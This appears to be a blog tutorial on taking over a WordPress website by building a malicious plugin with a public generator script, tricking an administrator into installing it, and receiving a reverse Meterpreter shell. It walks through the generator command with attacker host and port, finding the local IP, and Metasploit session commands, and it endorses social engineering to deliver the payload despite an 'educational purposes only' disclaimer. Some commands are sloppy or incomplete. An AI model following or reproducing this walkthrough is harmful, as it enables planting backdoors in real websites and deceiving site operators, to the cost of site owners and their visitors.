Hacking WordPress Website with Malicious Plug-in

Welcome back today we will talk about how we could compromise a WordPress website for a reverse meterpreter shell though use of malicious WordPress addons.

This will allow us to create a malicious WordPress plugin to use as a payload and achieve a reverse shell back to the attacking machine.


This tutorial is to show the threats of unknown plugins from rouge websites and social engineering methods. This tutorial is for educational purposes only the author of this guide will not be held responsible for misuse of this information.

First we will prepare malicious-wordpress-plugin this will allow us to generate a malicious WordPress plugin.


[sociallocker id=”968″]https://github.com/wetw0rk/malicious-wordpress-plugin[/sociallocker]

Open up a new terminal and navigate to directory for malicious-wordpress-plugin script.

You will now see the contents of the directory.

In a terminal navigate to the script directory and execute WordPress Zip Gen.

Use the following command to execute wordpress_zip_gen.py script.

python wordpress_zip_gen.py

So that we can establish a reverse connection we will first need to know our what our local IP address is. We can find this by typing “ifconfig” from a terminal your LHOST will be found under inet.


python wordpress_zip_gen.py [LHOST] [LPORT]


 python wordpress_zip_gen.py 443

wordpress_zip_gen will now generate a malicious WordPress addon and output it to the script directory.

This attack will require a little social engineering/trickery to deliver the payload.

The malicious WordPress Plugin can be named what ever your like.

Upload the malicious WordPress Plugin to the WordPress test environment & active Plugin.

After the Admin or site operator installs the malicious WordPress Plugin you should now have established a reverse connection back to the attacking machine via a meterpreter shell.

To check if your shell sessions has been successful you can list established sessions using commands.

Listing sessions:
session -i

Connecting to a session:
session -i 1

Once a remote connection is established between the WordPress website and the attacking machine we can then use “help” command to list available operations. This will allow us to list exploits available for the target web server. We have now come to the end of this guide if you enjoyed this tutorial consider liking and sharing it on Social media thanks.

Useful Msfvenom and Metasploit Commands